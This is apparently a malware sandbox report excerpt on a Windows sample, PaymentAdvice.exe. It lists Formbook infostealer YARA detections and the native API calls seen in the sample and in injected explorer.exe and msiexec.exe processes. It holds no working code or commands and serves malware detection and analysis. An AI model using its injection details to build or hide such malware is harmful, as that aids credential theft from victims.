          Source: 00000007.00000002.492784662.0000000000380000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.494092321.00000000007D0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.494092321.00000000007D0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.278046129.00000000006E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.278046129.00000000006E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0.2.PaymentAdvice.exe.2680000.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.PaymentAdvice.exe.2680000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.2.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.1.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.2.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.1.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0.2.PaymentAdvice.exe.2680000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.PaymentAdvice.exe.2680000.1.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Executable has a suspicious name (potential lure to open the executable)
          Source: PaymentAdvice.exe | Static file information: Suspicious name
          Initial sample is a PE file and has a suspicious name
          Source: initial sample | Static PE information: Filename: PaymentAdvice.exe
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_004181B0 NtCreateFile,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00418260 NtReadFile,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_004182E0 NtClose,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_004181AB NtCreateFile,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00418202 NtReadFile,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_004182DA NtClose,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_0041838A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A398F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A39860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A39840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A399A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A39910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A39A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A39A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A39A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A395D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A39540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A396E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A39660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A397A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A39780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A39FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A39710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A398A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A39820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A3B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A399D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A39950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A39A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A39A10 NtQuerySection,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A3A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A39B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A395F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A39520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A3AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A39560 NtWriteFile,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A396D0 NtCreateKey,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A39610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A39670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A39650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A39730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A3A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A39760 NtOpenProcess,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A39770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A3A770 NtOpenThread,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_1_004181B0 NtCreateFile,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_1_00418260 NtReadFile,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_1_004182E0 NtClose,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_1_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_1_004181AB NtCreateFile,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_1_00418202 NtReadFile,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_1_004182DA NtClose,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_1_0041838A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04679540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_046795D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04679660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04679650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_046796E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_046796D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04679710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04679FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04679780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04679860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04679840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04679910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_046799A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04679A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04679560 NtWriteFile,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04679520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0467AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_046795F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04679670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04679610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04679760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0467A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04679770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04679730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0467A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_046797A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0467B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04679820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_046798F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_046798A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04679950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_046799D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04679A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04679A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04679A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04679A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04679B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0467A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_003981B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_00398260 NtReadFile,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_003982E0 NtClose,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_00398390 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_003981AB NtCreateFile,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_00398202 NtReadFile,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_003982DA NtClose,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0039838A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 0_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 0_2_004046A7
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_0041C006
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00401030
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00408C4B
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00408C50
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00402D90
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_0041B7A2
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00402FB0
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A220A0
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00AC20A8
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A0B090
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00AC28EC
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00ACE824
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00AB1002
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A14120
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_009FF900
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00AC22AE
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A2EBB0
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00ABDBD2
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00AC2B28
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A0841F
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00ABD466
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A22581
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A0D5E0
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00AC25DD
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00AC2D07
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_009F0D20
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00AC1D55
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00AC2EF7
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A16E30
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00ABD616
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00AC1FF1
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_1_0041C006
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_1_00401030
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_1_00408C4B
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_1_00408C50
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_1_00402D90
          Source: C:\Windows\explorer.exe | Code function: 3_2_070A2302
          Source: C:\Windows\explorer.exe | Code function: 3_2_0709F902
          Source: C:\Windows\explorer.exe | Code function: 3_2_070A0362
          Source: C:\Windows\explorer.exe | Code function: 3_2_070A65B2
          Source: C:\Windows\explorer.exe | Code function: 3_2_070A57C7
          Source: C:\Windows\explorer.exe | Code function: 3_2_070A4062
          Source: C:\Windows\explorer.exe | Code function: 3_2_0709F8F9
          Source: C:\Windows\explorer.exe | Code function: 3_2_070A22FF
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_046FD466
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0464841F
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04701D55
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04630D20
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04702D07
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0464D5E0
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_047025DD
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04662581
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04656E30
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_046FD616
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04702EF7
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04701FF1
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_046F1002
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_047028EC
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_046620A0
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_047020A8
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0464B090
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04654120
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0463F900
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_047022AE
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04702B28
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_046FDBD2
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0466EBB0
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_00388C50
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_00388C4B
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_00382D90
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_00382FB0
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: String function: 0463B150 appears 35 times
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: String function: 009FB150 appears 35 times
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: String function: 00419F60 appears 38 times
          Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: String function: 0041A090 appears 38 times
          Source: PaymentAdvice.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: PaymentAdvice.exe, 00000000.00000003.233898045.000000001F21F000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs PaymentAdvice.exe
          Source: PaymentAdvice.exe, 00000002.00000002.278186633.000000000096F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamemsiexec.exeX vs PaymentAdvice.exe
          Source: PaymentAdvice.exe, 00000002.00000002.278485977.0000000000C7F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs PaymentAdvice.exe
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
          Source: PaymentAdvice.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 00000007.00000002.493924242.00000000007A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 00000007.00000002.493924242.00000000007A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 00000002.00000002.277986099.00000000006B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 00000002.00000002.277986099.00000000006B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 00000002.00000002.277857898.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 00000002.00000002.277857898.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 00000000.00000002.237687688.0000000002680000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 00000000.00000002.237687688.0000000002680000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 00000007.00000002.492784662.0000000000380000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 00000007.00000002.492784662.0000000000380000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 00000007.00000002.494092321.00000000007D0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 00000007.00000002.494092321.00000000007D0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 00000002.00000002.278046129.00000000006E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 00000002.00000002.278046129.00000000006E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 0.2.PaymentAdvice.exe.2680000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 0.2.PaymentAdvice.exe.2680000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 2.2.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 2.2.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 2.1.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 2.1.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
